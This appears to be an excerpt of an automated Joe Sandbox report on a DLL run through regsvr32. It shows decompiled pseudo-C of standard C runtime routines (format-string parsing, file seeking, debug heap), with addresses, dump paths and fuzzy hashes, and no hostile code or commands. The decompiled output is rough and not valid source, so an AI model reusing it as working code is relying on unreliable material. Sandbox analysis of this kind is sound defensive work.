                                                                                                                                            				_a80 = 0;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				_a76 = 0;
                                                                                                                                            				_a1404 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1404 == 0x20) goto 0x65d0dd05;
                                                                                                                                            				if (_a1404 == 0x23) goto 0x65d0dd12;
                                                                                                                                            				if (_a1404 == 0x2b) goto 0x65d0dcf8;
                                                                                                                                            				if (_a1404 == 0x2d) goto 0x65d0dceb;
                                                                                                                                            				if (_a1404 == 0x30) goto 0x65d0dd20;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000001;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000002;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				asm("bts eax, 0x7");
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000008;
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0dd6c;
                                                                                                                                            				_t210 =  &_a1560;
                                                                                                                                            				_a88 = E00007FFC7FFC65D01E40(_t210);
                                                                                                                                            				if (_a88 >= 0) goto 0x65d0dd6a;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				_a88 =  ~_a88;
                                                                                                                                            				goto 0x65d0dd83;
                                                                                                                                            				_a88 = _t190 + _t210 - 0x30;
                                                                                                                                            				_a116 = 0;
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0ddc4;
                                                                                                                                            				_t211 =  &_a1560;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t211);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0ddc2;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0dddb;
                                                                                                                                            				_a116 = _t190 + _t211 - 0x30;
                                                                                                                                            				_a1408 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1408 == 0x49) goto 0x65d0de66;
                                                                                                                                            				if (_a1408 == 0x68) goto 0x65d0df6f;
                                                                                                                                            				if (_a1408 == 0x6c) goto 0x65d0de24;
                                                                                                                                            				if (_a1408 == 0x77) goto 0x65d0df7c;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x65d0de56;
                                                                                                                                            				_a1544 =  &(_a1544[1]);
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0de61;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x65d0deb8;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x65d0deb8;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x65d0defb;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x65d0defb;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x65d0df5d;
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				_a1216 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0DC41;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a1412 = _a1208 & 0x0000ffff;
                                                                                                                                            				_a1412 = _a1412 - 0x41;
                                                                                                                                            				if (_a1412 - 0x37 > 0) goto 0x65d0ea2a;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}






                                                                                                                                            0x7ffc65d0dc41
                                                                                                                                            0x7ffc65d0dc61
                                                                                                                                            0x7ffc65d0dc6b
                                                                                                                                            0x7ffc65d0dc77
                                                                                                                                            0x7ffc65d0dc7f
                                                                                                                                            0x7ffc65d0dc87
                                                                                                                                            0x7ffc65d0dc8b
                                                                                                                                            0x7ffc65d0dc93
                                                                                                                                            0x7ffc65d0dc9b
                                                                                                                                            0x7ffc65d0dcb0
                                                                                                                                            0x7ffc65d0dcbf
                                                                                                                                            0x7ffc65d0dcc9
                                                                                                                                            0x7ffc65d0dcd3
                                                                                                                                            0x7ffc65d0dcdd
                                                                                                                                            0x7ffc65d0dce7
                                                                                                                                            0x7ffc65d0dce9
                                                                                                                                            0x7ffc65d0dcf2
                                                                                                                                            0x7ffc65d0dcf6
                                                                                                                                            0x7ffc65d0dcff
                                                                                                                                            0x7ffc65d0dd03
                                                                                                                                            0x7ffc65d0dd0c
                                                                                                                                            0x7ffc65d0dd10
                                                                                                                                            0x7ffc65d0dd16
                                                                                                                                            0x7ffc65d0dd1e
                                                                                                                                            0x7ffc65d0dd27
                                                                                                                                            0x7ffc65d0dd3b
                                                                                                                                            0x7ffc65d0dd3d
                                                                                                                                            0x7ffc65d0dd4a
                                                                                                                                            0x7ffc65d0dd53
                                                                                                                                            0x7ffc65d0dd5c
                                                                                                                                            0x7ffc65d0dd66
                                                                                                                                            0x7ffc65d0dd6a
                                                                                                                                            0x7ffc65d0dd7f
                                                                                                                                            0x7ffc65d0dd88
                                                                                                                                            0x7ffc65d0dda0
                                                                                                                                            0x7ffc65d0dda2
                                                                                                                                            0x7ffc65d0ddaf
                                                                                                                                            0x7ffc65d0ddb8
                                                                                                                                            0x7ffc65d0ddba
                                                                                                                                            0x7ffc65d0ddc2
                                                                                                                                            0x7ffc65d0ddd7
                                                                                                                                            0x7ffc65d0dde8
                                                                                                                                            0x7ffc65d0ddf7
                                                                                                                                            0x7ffc65d0de01
                                                                                                                                            0x7ffc65d0de0f
                                                                                                                                            0x7ffc65d0de19
                                                                                                                                            0x7ffc65d0de1f
                                                                                                                                            0x7ffc65d0de32
                                                                                                                                            0x7ffc65d0de40
                                                                                                                                            0x7ffc65d0de4c
                                                                                                                                            0x7ffc65d0de54
                                                                                                                                            0x7ffc65d0de5d
                                                                                                                                            0x7ffc65d0de61
                                                                                                                                            0x7ffc65d0de6a
                                                                                                                                            0x7ffc65d0de80
                                                                                                                                            0x7ffc65d0de91
                                                                                                                                            0x7ffc65d0de9f
                                                                                                                                            0x7ffc65d0deab
                                                                                                                                            0x7ffc65d0deb3
                                                                                                                                            0x7ffc65d0dec6
                                                                                                                                            0x7ffc65d0ded7
                                                                                                                                            0x7ffc65d0dee5
                                                                                                                                            0x7ffc65d0def1
                                                                                                                                            0x7ffc65d0def9
                                                                                                                                            0x7ffc65d0df09
                                                                                                                                            0x7ffc65d0df19
                                                                                                                                            0x7ffc65d0df29
                                                                                                                                            0x7ffc65d0df39
                                                                                                                                            0x7ffc65d0df49
                                                                                                                                            0x7ffc65d0df59
                                                                                                                                            0x7ffc65d0df5b
                                                                                                                                            0x7ffc65d0df5d
                                                                                                                                            0x7ffc65d0df68
                                                                                                                                            0x7ffc65d0df6d
                                                                                                                                            0x7ffc65d0df76
                                                                                                                                            0x7ffc65d0df7a
                                                                                                                                            0x7ffc65d0df80
                                                                                                                                            0x7ffc65d0df95
                                                                                                                                            0x7ffc65d0dfa6
                                                                                                                                            0x7ffc65d0dfb5
                                                                                                                                            0x7ffc65d0dfdc

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2192614184-734865713
                                                                                                                                            • Opcode ID: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                                                                                            • Instruction ID: 681284edc7f91960f2c04d22b2207d8ff4532e26e28a590d4264cba515a4ba8b
                                                                                                                                            • Opcode Fuzzy Hash: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                                                                                            • Instruction Fuzzy Hash: CA4139A290C6EAC5E7749F15E5403BAB6A1FB84B49F600936D68D836D9DF3CD440CF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 24%
                                                                                                                                            			E00007FFC7FFC65D0BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                                                                            				void* _t114;
                                                                                                                                            				char* _t134;
                                                                                                                                            
                                                                                                                                            				_a116 = 0;
                                                                                                                                            				if (_a696 != 0x2a) goto 0x65d0be16;
                                                                                                                                            				_t134 =  &_a1112;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t134);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0be14;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0be2d;
                                                                                                                                            				_a116 = _t114 + _t134 - 0x30;
                                                                                                                                            				_a972 = _a696 & 0x000000ff;
                                                                                                                                            				if (_a972 == 0x49) goto 0x65d0beb7;
                                                                                                                                            				if (_a972 == 0x68) goto 0x65d0bfc0;
                                                                                                                                            				if (_a972 == 0x6c) goto 0x65d0be76;
                                                                                                                                            				if (_a972 == 0x77) goto 0x65d0bfcd;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				if ( *_a1096 != 0x6c) goto 0x65d0bea7;
                                                                                                                                            				_a1096 = _a1096 + 1;
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0beb2;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if ( *_a1096 != 0x36) goto 0x65d0bf09;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x65d0bf09;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 != 0x33) goto 0x65d0bf4c;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x65d0bf4c;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 == 0x64) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x69) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x6f) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x75) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x78) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 != 0x58) goto 0x65d0bfae;
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				_a704 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0BB66;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a976 = _a696;
                                                                                                                                            				_a976 = _a976 - 0x41;
                                                                                                                                            				if (_a976 - 0x37 > 0) goto 0x65d0ca31;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}





                                                                                                                                            0x7ffc65d0bdda
                                                                                                                                            0x7ffc65d0bdf2
                                                                                                                                            0x7ffc65d0bdf4
                                                                                                                                            0x7ffc65d0be01
                                                                                                                                            0x7ffc65d0be0a
                                                                                                                                            0x7ffc65d0be0c
                                                                                                                                            0x7ffc65d0be14
                                                                                                                                            0x7ffc65d0be29
                                                                                                                                            0x7ffc65d0be3a
                                                                                                                                            0x7ffc65d0be49
                                                                                                                                            0x7ffc65d0be53
                                                                                                                                            0x7ffc65d0be61
                                                                                                                                            0x7ffc65d0be6b
                                                                                                                                            0x7ffc65d0be71
                                                                                                                                            0x7ffc65d0be84
                                                                                                                                            0x7ffc65d0be91
                                                                                                                                            0x7ffc65d0be9d
                                                                                                                                            0x7ffc65d0bea5
                                                                                                                                            0x7ffc65d0beae
                                                                                                                                            0x7ffc65d0beb2
                                                                                                                                            0x7ffc65d0bebb
                                                                                                                                            0x7ffc65d0bed1
                                                                                                                                            0x7ffc65d0bee2
                                                                                                                                            0x7ffc65d0bef0
                                                                                                                                            0x7ffc65d0befc
                                                                                                                                            0x7ffc65d0bf04
                                                                                                                                            0x7ffc65d0bf17
                                                                                                                                            0x7ffc65d0bf28
                                                                                                                                            0x7ffc65d0bf36
                                                                                                                                            0x7ffc65d0bf42
                                                                                                                                            0x7ffc65d0bf4a
                                                                                                                                            0x7ffc65d0bf5a
                                                                                                                                            0x7ffc65d0bf6a
                                                                                                                                            0x7ffc65d0bf7a
                                                                                                                                            0x7ffc65d0bf8a
                                                                                                                                            0x7ffc65d0bf9a
                                                                                                                                            0x7ffc65d0bfaa
                                                                                                                                            0x7ffc65d0bfac
                                                                                                                                            0x7ffc65d0bfae
                                                                                                                                            0x7ffc65d0bfb9
                                                                                                                                            0x7ffc65d0bfbe
                                                                                                                                            0x7ffc65d0bfc7
                                                                                                                                            0x7ffc65d0bfcb
                                                                                                                                            0x7ffc65d0bfd1
                                                                                                                                            0x7ffc65d0bfe6
                                                                                                                                            0x7ffc65d0bff7
                                                                                                                                            0x7ffc65d0c006
                                                                                                                                            0x7ffc65d0c02d

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2192614184-192189897
                                                                                                                                            • Opcode ID: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                                                                                            • Instruction ID: 52a68eeb24b1f977a9600ef3ad9f55d6367e0ec4890cf1f2f819e9f3be96c58a
                                                                                                                                            • Opcode Fuzzy Hash: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                                                                                            • Instruction Fuzzy Hash: 4B413A6290C6EACAE774DF24E5543BEB7A4EB84B04F600936D69D825E9DF6CD140CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 24%
                                                                                                                                            			E00007FFC7FFC65D0DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                                                                            				void* _t114;
                                                                                                                                            				char* _t134;
                                                                                                                                            
                                                                                                                                            				_a116 = 0;
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0ddc4;
                                                                                                                                            				_t134 =  &_a1560;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t134);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0ddc2;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0dddb;
                                                                                                                                            				_a116 = _t114 + _t134 - 0x30;
                                                                                                                                            				_a1408 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1408 == 0x49) goto 0x65d0de66;
                                                                                                                                            				if (_a1408 == 0x68) goto 0x65d0df6f;
                                                                                                                                            				if (_a1408 == 0x6c) goto 0x65d0de24;
                                                                                                                                            				if (_a1408 == 0x77) goto 0x65d0df7c;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x65d0de56;
                                                                                                                                            				_a1544 =  &(_a1544[1]);
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0de61;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x65d0deb8;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x65d0deb8;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x65d0defb;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x65d0defb;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x65d0df5d;
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				_a1216 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0DC41;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a1412 = _a1208 & 0x0000ffff;
                                                                                                                                            				_a1412 = _a1412 - 0x41;
                                                                                                                                            				if (_a1412 - 0x37 > 0) goto 0x65d0ea2a;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}





                                                                                                                                            0x7ffc65d0dd88
                                                                                                                                            0x7ffc65d0dda0
                                                                                                                                            0x7ffc65d0dda2
                                                                                                                                            0x7ffc65d0ddaf
                                                                                                                                            0x7ffc65d0ddb8
                                                                                                                                            0x7ffc65d0ddba
                                                                                                                                            0x7ffc65d0ddc2
                                                                                                                                            0x7ffc65d0ddd7
                                                                                                                                            0x7ffc65d0dde8
                                                                                                                                            0x7ffc65d0ddf7
                                                                                                                                            0x7ffc65d0de01
                                                                                                                                            0x7ffc65d0de0f
                                                                                                                                            0x7ffc65d0de19
                                                                                                                                            0x7ffc65d0de1f
                                                                                                                                            0x7ffc65d0de32
                                                                                                                                            0x7ffc65d0de40
                                                                                                                                            0x7ffc65d0de4c
                                                                                                                                            0x7ffc65d0de54
                                                                                                                                            0x7ffc65d0de5d
                                                                                                                                            0x7ffc65d0de61
                                                                                                                                            0x7ffc65d0de6a
                                                                                                                                            0x7ffc65d0de80
                                                                                                                                            0x7ffc65d0de91
                                                                                                                                            0x7ffc65d0de9f
                                                                                                                                            0x7ffc65d0deab
                                                                                                                                            0x7ffc65d0deb3
                                                                                                                                            0x7ffc65d0dec6
                                                                                                                                            0x7ffc65d0ded7
                                                                                                                                            0x7ffc65d0dee5
                                                                                                                                            0x7ffc65d0def1
                                                                                                                                            0x7ffc65d0def9
                                                                                                                                            0x7ffc65d0df09
                                                                                                                                            0x7ffc65d0df19
                                                                                                                                            0x7ffc65d0df29
                                                                                                                                            0x7ffc65d0df39
                                                                                                                                            0x7ffc65d0df49
                                                                                                                                            0x7ffc65d0df59
                                                                                                                                            0x7ffc65d0df5b
                                                                                                                                            0x7ffc65d0df5d
                                                                                                                                            0x7ffc65d0df68
                                                                                                                                            0x7ffc65d0df6d
                                                                                                                                            0x7ffc65d0df76
                                                                                                                                            0x7ffc65d0df7a
                                                                                                                                            0x7ffc65d0df80
                                                                                                                                            0x7ffc65d0df95
                                                                                                                                            0x7ffc65d0dfa6
                                                                                                                                            0x7ffc65d0dfb5
                                                                                                                                            0x7ffc65d0dfdc

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2192614184-734865713
                                                                                                                                            • Opcode ID: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                                                                                            • Instruction ID: 629fe75bddd110bcbe3f494e9e481304ed322370f88eb9c79b48de38afa2cc25
                                                                                                                                            • Opcode Fuzzy Hash: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                                                                                            • Instruction Fuzzy Hash: A0413BA290C6AAC5E774DF24E5403BAB6A0FB84B49F600936D68D876D9DF3CD440CF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 00007FFC65D09578
                                                                                                                                            • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 00007FFC65D09563
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                                                                                                                            • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                                                                                            • API String ID: 275287319-2412454244
                                                                                                                                            • Opcode ID: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                                                                                            • Instruction ID: 9b5d41b92ba6a939e82ab079635260e0d1a2c247cb22e136a7510d0c69e9382d
                                                                                                                                            • Opcode Fuzzy Hash: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                                                                                            • Instruction Fuzzy Hash: F331817261CB99C6D614CF25E98052AB761FB85BA0F604735E6BE47AE9CF3CD401CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_unlock
                                                                                                                                            • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                                                                            • API String ID: 2816345473-1282596470
                                                                                                                                            • Opcode ID: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                                                                                            • Instruction ID: 750cb8af3086d7eaa75dcd0bdc61f49a07e38664bfca28768265455650e1ecbc
                                                                                                                                            • Opcode Fuzzy Hash: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                                                                                            • Instruction Fuzzy Hash: 06317A7291C66ADBF3208F24E94432A73A0FF44B64F201934E24D866E5CB7DE488CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free_nolock$_unlock
                                                                                                                                            • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                                                                                                                            • API String ID: 2500497606-1087415141
                                                                                                                                            • Opcode ID: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
